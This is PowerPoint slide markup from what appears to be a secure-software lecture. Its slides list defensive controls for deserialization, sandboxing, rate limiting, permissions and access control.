          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attack Surface Minimization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="64425789"/>
      </p:ext>
    </p:extLst>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13CBD-9808-47E2-A480-208156C13DBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="609600"/>
            <a:ext cx="8229600" cy="808038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Insecure Deserialization, XML Input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9197B0E8-1192-49B2-A1FF-51163819504E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{482A77FD-38F8-413D-9471-56F4C2F5AB85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Serialization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: packetizing an instance/object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Deserialization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: depacketizing input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used in RPC, caching, database access, cookies, authentication tokens, html forms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{019B4139-CECD-4E0A-BB9A-10B8BB9A0B59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Controls</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31326056-5FF5-4F77-B438-25380B39222A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Integrity checks on serialized objects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Allow only primitive data type serialization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Use positive (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>allowlist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>) checking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Enforcing strict type constraints</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Run code that executes deserialization in low privilege</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Log errors, exceptions, failures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19176681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9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10BE93F0-CA9C-4857-8AAA-4FA2C223C55C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="685800"/>
            <a:ext cx="8229600" cy="731838"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>Control: Jail, Sandbox, Rate Limiting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27651" name="Text Placeholder 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5919D5FD-DE10-4EF1-9DCD-F0DA76E0D249}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Jail</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15364" name="Content Placeholder 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CA1C576-06B2-4C02-8EED-54D6F7D50575}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OS imposes resource limits on programs. It may include:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I/O bandwidth caps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>disk quotas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>network access restrictions </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>restricted file system namespace</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27653" name="Text Placeholder 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A33FFBED-DADC-4882-8B02-E270B53B9ADA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Sandbox</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15366" name="Content Placeholder 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4696E649-A817-404C-BE29-627BF6EA1D6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Quarantines an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> program as it runs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can execute untested/ untrusted programs from untrusted third-parties, suppliers, and users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Rate Limiting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Limiting frequency of transactions to prevent breaches.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E5EEF2B4-8299-43CC-B15D-83F3BC3A325B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="520700" y="685800"/>
            <a:ext cx="8154988" cy="498475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Control:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Authentication &amp; Permissions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43011" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4F0D759-5CDB-4066-B3FE-B083CFE1B093}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Permissions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>:  minimize permissions at all times: by level (e.g., normal versus administrative</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">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Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> and by role (e.g., role-based access control).  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>rovide higher level access only when you need it.  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Use Role-Based Access Control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Verify authentication at server side for every input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Only provide higher level access when you need it; always run with the minimum possible authorization level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Check that files read have the required access level permissions; administrators may not set them properly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Random number generator: Use a good one when generating random session keys – if not random, attackers will figure out next key sequence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791B39-3121-C17A-D663-2B517C9DFF7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marR="0" lvl="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Resources:  Keep resources such as files, devices, and communications open for the smallest period possible.  After using a resource, close it! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0">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Jail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>:  The OS imposes resource limits on programs: restricts I/O bandwidth, disk quotas, network access and file system namespace access. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="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Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>rate limiting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> limits the number of transactions that can occur in a specific period (e.g., preventing breaches).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="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Caching:  Prevent web caches from being saved in the network or computer, to reduce transmissions for identical data.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="115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Sensitive web pages should never be cached and must have an active authorization token.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="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Credentials:  Never hardcode a login/password credential, in case of discovery.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>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EA281C44-F696-C6D3-4085-85D1C9CA46F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Control: Authentication &amp; Permissions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2187679200"/>
      </p:ext>
    </p:extLst>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A66E8-7371-4B5D-91CF-19AEDEF7AB21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Controls: Access Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{293F07D3-3ED7-4B6A-9EB1-AB28D3DFFCC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Server-side enforcement is based on user ID and record ownership (not any record)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Ensure client cannot modify access control data (via encryption, integrity checks)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Enforce business rules (e.g., range checks)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Log access control failures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Disable web server directory listing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24739033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7D04E-047A-40EC-90DB-8E99527266B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security Features</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{167F4817-9781-4068-BCA2-FFC16C0ECF91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integrity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Logging</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12938849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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{354E13F0-0472-4B93-93D3-B7676441B9A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="609600"/>
            <a:ext cx="8229600" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Attack:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
